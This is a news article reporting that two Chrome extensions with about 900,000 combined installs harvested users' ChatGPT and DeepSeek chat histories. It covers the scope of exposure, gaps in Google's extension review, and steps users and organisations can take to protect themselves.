📰 INDUSTRY NEWS

Chrome Extensions Caught Harvesting ChatGPT & DeepSeek Chats: A Wake-Up Call for AI Privacy

📅 December 31, 2025 ⏱️ 8 min read

📋 TL;DR

Security researchers discovered two Chrome extensions with over 900,000 combined installations secretly harvesting users' ChatGPT and DeepSeek chat histories. Despite bearing Google's "Featured" badge, these extensions exfiltrated sensitive AI conversations every 30 minutes, potentially exposing proprietary code, personal data, and corporate secrets.

The Hidden Threat in Your Browser: AI Chat Data at Risk

In a startling revelation that underscores the growing security challenges in the AI era, security researchers at OX Security have uncovered a sophisticated malware campaign targeting users of popular AI chat services. Two Chrome extensions, masquerading as legitimate AI productivity tools, have been systematically harvesting sensitive chat data from ChatGPT and DeepSeek users, with combined installations exceeding 900,000.

The discovery highlights a critical vulnerability in how users interact with AI services and the potential for malicious actors to exploit the trust placed in browser extensions. Even more concerning, one of the extensions bears Google's "Featured" badge – a designation typically associated with verified, high-quality applications.

The Malicious Extensions Uncovered

Security researchers identified two primary extensions involved in the data harvesting operation:

1. Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI

This extension boasts over 600,000 users and prominently displays Google's "Featured" badge. Marketed as a comprehensive AI assistant tool, it promises seamless integration with multiple AI models including ChatGPT, Claude, and DeepSeek. The extension adds a sidebar interface that appears to enhance productivity by providing quick access to AI capabilities across any website.

2. AI Sidebar with Deepseek, ChatGPT, Claude, and more

With over 300,000 installations, this extension positions itself as a universal AI companion. It offers similar functionality, claiming to bring the power of multiple AI models to users' fingertips through a convenient sidebar interface. The extension's description emphasizes productivity enhancement and seamless AI integration.

How the Attack Works

The malicious extensions employ a sophisticated dual-function approach that makes them particularly dangerous:

Legitimate Functionality as a Smokescreen

Both extensions deliver on their promised features, providing users with functional AI integration tools. This legitimate functionality serves as cover for their malicious activities, making detection difficult for average users who experience no obvious performance issues or suspicious behavior.

Systematic Data Exfiltration

Every 30 minutes, the extensions silently transmit users' AI chat histories to external servers. This includes:

  • Complete conversation logs with ChatGPT and DeepSeek
  • Browsing activity and website interactions
  • Potentially sensitive information shared during AI conversations
  • Personal and corporate data inadvertently exposed during AI queries

Persistent Covert Operations

The extensions maintain persistent background connections, ensuring continuous data collection even when users aren't actively engaging with the AI features. This always-on approach maximizes the amount of data harvested while minimizing the chances of detection.

The Scope of Exposure

The implications of this breach extend far beyond simple data theft. AI conversations often contain highly sensitive information, including:

Corporate Intelligence

Users frequently share proprietary code, business strategies, financial data, and confidential documents with AI assistants for analysis or optimization. This information, now in the hands of malicious actors, could be weaponized for:

  • Corporate espionage and competitive intelligence
  • Insider trading based on confidential financial information
  • Targeted attacks on specific organizations
  • Intellectual property theft

Personal Data Compromise

Individual users often discuss personal matters, share private documents, or seek advice on sensitive topics with AI assistants. The harvested data could enable:

  • Identity theft and financial fraud
  • Blackmail and extortion schemes
  • Targeted phishing campaigns based on personal information
  • Social engineering attacks

Security Infrastructure Vulnerabilities

Developers and IT professionals regularly use AI assistants to debug code, discuss security implementations, and troubleshoot infrastructure issues. Exposed information could reveal:

  • System vulnerabilities and security flaws
  • Network architecture details
  • Authentication mechanisms and access protocols
  • Database structures and API endpoints

Technical Analysis: The Anatomy of the Attack

From a technical perspective, the extensions exploit several vulnerabilities in the Chrome extension ecosystem:

Permission Abuse

The extensions likely request broad permissions under the guise of functionality requirements, including:

  • Access to all websites (for the sidebar feature)
  • Reading and modifying browser data
  • Network communication capabilities
  • Storage access for "optimization" purposes

Obfuscated Code Implementation

Malicious functionality is typically hidden within legitimate code, using techniques such as:

  • Code obfuscation to hide malicious functions
  • Dynamic code loading to bypass static analysis
  • Encryption of exfiltrated data to avoid detection
  • Use of legitimate-looking domains for data transmission

Evasion Techniques

The extensions employ various evasion methods to avoid detection:

  • Staggered data transmission to avoid pattern recognition
  • Use of HTTPS to blend with normal web traffic
  • Minimal system resource usage to avoid performance flags
  • Legitimate-looking network requests that mimic API calls

Google's Response and Platform Vulnerabilities

The fact that one extension bears Google's "Featured" badge raises serious questions about the platform's security review processes. Despite OX Security notifying Google of their findings, the extensions remained available as of December 30th, 2025, highlighting potential gaps in:

Review Process Inadequacies

  • Insufficient code analysis during the approval process
  • Limited behavioral monitoring of extensions post-publication
  • Inadequate verification of developer identities and intentions
  • Delayed response to reported security issues

The Featured Badge Paradox

The presence of a "Featured" badge on a malicious extension creates a false sense of security, potentially increasing the number of victims. This suggests that:

  • Featured status may be based on popularity rather than security
  • Manual review processes may miss sophisticated threats
  • Automated scanning tools require enhancement

Protecting Yourself: Immediate Actions and Long-term Strategies

Immediate Steps

If you suspect you may have installed these extensions:

  1. Immediately remove the suspicious extensions from Chrome
  2. Clear browser cache and cookies
  3. Review recent AI conversations for sensitive information exposure
  4. Change passwords for accounts discussed with AI assistants
  5. Monitor financial accounts for unusual activity

Extension Security Best Practices

Moving forward, adopt these security measures:

  • Limit extensions to those from verified developers with established reputations
  • Carefully review permissions requested by each extension
  • Regularly audit installed extensions and remove unnecessary ones
  • Use browser profiles to isolate work and personal browsing
  • Consider using dedicated browsers for sensitive AI interactions

Enterprise Security Measures

Organizations should implement:

  • Browser extension policies restricting installations to approved extensions
  • Regular security awareness training on extension risks
  • Network monitoring to detect suspicious data transmissions
  • Endpoint detection and response (EDR) solutions
  • Regular security audits of browser environments

The Broader Implications for AI Security

This incident reveals fundamental security challenges in the AI ecosystem:

Trust Model Vulnerabilities

The attack exploits the trust users place in both AI assistants and browser extensions, creating a compound vulnerability that amplifies the risk of data exposure.

Data Persistence Challenges

Unlike traditional data breaches that involve specific databases, this attack captures dynamic, ongoing conversations that may contain increasingly sensitive information over time.

Regulatory Considerations

The incident raises questions about liability and responsibility when AI interactions are compromised, particularly regarding compliance with data protection regulations like GDPR and CCPA.

Looking Ahead: The Future of AI Privacy

As AI integration deepens across all aspects of digital life, several developments are crucial:

Enhanced Browser Security

Browser vendors must implement more rigorous extension review processes, including:

  • Real-time behavioral analysis of extensions
  • Machine learning-based threat detection
  • User-friendly permission management systems
  • Rapid response mechanisms for reported threats

AI Service Provider Responsibilities

Companies like OpenAI and DeepSeek should consider:

  • Browser extension security guidelines for users
  • Detection mechanisms for unauthorized data access
  • Encrypted communication protocols with browser extensions
  • User education about privacy risks

User Education and Awareness

The AI community must prioritize educating users about:

  • Privacy implications of AI conversations
  • Best practices for secure AI usage
  • Recognition of potential security threats
  • Regular security hygiene practices

Conclusion: A Call for Vigilance

The discovery of malicious Chrome extensions harvesting ChatGPT and DeepSeek conversations serves as a critical wake-up call for the AI community. With over 900,000 installations and counting, the scale of potential data exposure is staggering. The incident underscores the need for heightened vigilance as AI tools become increasingly integrated into our daily workflows.

As we continue to embrace AI assistants for everything from creative writing to code development, maintaining security awareness becomes paramount. The convenience of AI integration must never come at the cost of data privacy and security. Users, developers, and platform providers all share responsibility for creating a secure AI ecosystem that protects sensitive information while enabling innovation.

The challenge moving forward is clear: we must develop security frameworks that can keep pace with rapid AI advancement while maintaining the user trust essential for widespread adoption. Only through collaborative efforts between security researchers, platform providers, and users can we ensure that the AI revolution doesn't become a privacy nightmare.

Key Features

🛡️

Browser Extension Security

Advanced techniques for identifying and mitigating malicious browser extensions

🔍

AI Privacy Protection

Methods for securing AI conversations and preventing data exfiltration

Real-time Threat Detection

Monitoring systems to detect suspicious extension behavior

📊

Data Exposure Analysis

Understanding the scope and impact of compromised AI conversations

✅ Strengths

  • ✓ Heightened awareness of browser extension security risks
  • ✓ Improved understanding of AI privacy vulnerabilities
  • ✓ Enhanced security practices for AI tool usage
  • ✓ Development of better detection mechanisms for malicious extensions

⚠️ Considerations

  • • Significant data exposure for affected users
  • • Erosion of trust in browser extension ecosystems
  • • Potential for widespread corporate espionage
  • • Delayed response times from platform providers

🚀 Learn how to secure your AI workflows and protect against extension-based threats

Ready to explore? Check out the official resource.

Learn how to secure your AI workflows and protect against extension-based threats →
security privacy chrome-extensions chatgpt deepseek malware data-breach ai-security